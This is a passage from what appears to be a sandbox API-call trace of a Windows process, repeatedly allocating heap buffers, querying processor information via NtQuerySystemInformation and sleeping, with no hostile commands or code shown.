RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0298.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0298.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0298.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0298.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0298.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0298.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0298.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0298.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.785] Sleep (dwMilliseconds=0x110) [0298.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0298.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0298.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0298.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0298.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0298.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0298.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.798] Sleep (dwMilliseconds=0x110) [0298.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0298.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0298.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0298.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0298.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0298.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0298.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0298.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0298.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.812] Sleep (dwMilliseconds=0x110) [0298.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0298.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0298.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0298.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0298.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0298.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0298.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0298.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0298.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.833] Sleep (dwMilliseconds=0x110) [0298.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0298.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0298.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0298.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0298.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0298.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0298.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0298.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0298.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.849] Sleep (dwMilliseconds=0x110) [0298.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0298.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0298.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0298.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0298.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0298.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0298.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0298.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0298.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.864] Sleep (dwMilliseconds=0x110) [0298.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0298.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0298.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0298.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0298.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0298.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0298.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0298.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0298.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.881] Sleep (dwMilliseconds=0x110) [0298.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0298.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0298.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0298.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0298.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0298.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0298.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.896] Sleep (dwMilliseconds=0x110) [0298.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0298.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0298.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0298.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0298.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0298.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0298.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0298.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0298.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.924] Sleep (dwMilliseconds=0x110) [0298.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0298.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0298.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0298.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0298.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0298.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0298.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0298.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0298.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.943] Sleep (dwMilliseconds=0x110) [0298.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0298.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0298.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0298.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0298.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0298.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0298.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0298.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0298.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.958] Sleep (dwMilliseconds=0x110) [0298.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0298.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.966] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0298.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0298.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0298.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0298.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0298.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0298.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0298.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.969] Sleep (dwMilliseconds=0x110) [0298.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0298.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0298.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0298.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0298.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0298.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0298.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0298.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0298.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.987] Sleep (dwMilliseconds=0x110) [0298.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0298.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0298.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0298.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0299.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0299.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0299.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0299.004] RtlAllocateHeap 